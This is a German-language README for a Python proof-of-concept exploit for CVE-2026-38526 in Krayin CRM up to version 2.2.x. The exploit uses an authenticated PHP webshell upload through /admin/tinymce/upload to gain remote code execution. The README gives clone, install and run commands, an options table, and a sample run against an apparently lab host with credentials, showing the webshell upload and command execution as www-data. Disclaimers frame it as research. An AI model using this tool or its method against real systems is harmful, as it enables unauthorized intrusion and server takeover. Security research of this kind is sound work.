
Python-PoC, das CVE-2026-38526 in Krayin CRM <= 2.2.x ausnutzt: authentifizierter PHP-Webshell-Upload über /admin/tinymce/upload, der zu Remote-Code-Execution führt.
⚠️ Rechtlicher Hinweis: Dieser Code wird ausschließlich zu Bildungszwecken und für autorisierte Tests bereitgestellt (CTF, Bug Bounty, privates Labor). Der Autor ist nicht für eine illegale Nutzung verantwortlich.
Krayin CRM (Webkul) ≤ 2.2.x stellt den Endpoint /admin/tinymce/upload
bereit, der es einem authentifizierten Benutzer (auch mit geringen
Rechten) ermöglicht, Dateien ohne Validierung der Dateiendung
hochzuladen. Die Datei wird anschließend aus dem Ordner storage/
ausgeliefert, was die beliebige Ausführung von PHP-Code ermöglicht.
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
Optionen:
| Option | Beschreibung |
|---|---|
-t, --target | Root-URL des Ziels |
-u, --user | E-Mail des Krayin-Kontos |
-p, --password | Passwort |
-c, --command | Auszuführender Befehl (Standard: id) |
--login-path | Login-Pfad (Standard: /admin/login) |
--upload-path | Upload-Pfad (Standard: /admin/tinymce/upload) |
--timeout | HTTP-Timeout (Standard: 15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] Abrufen des CSRF-Tokens auf http://billing.nexus.htb/admin/login
[*] Senden des Login-Formulars
[+] Authentifizierung erfolgreich
[*] Upload von x8f2k1ab.php über http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell erreichbar: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Ausführung: id
============================================================
[+] Befehl: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ und uploads/ verbieten.Dieses Projekt wird zu Zwecken der Sicherheitsforschung veröffentlicht. Jede Nutzung gegen Systeme ohne vorherige schriftliche Genehmigung ist illegal und strengstens verboten.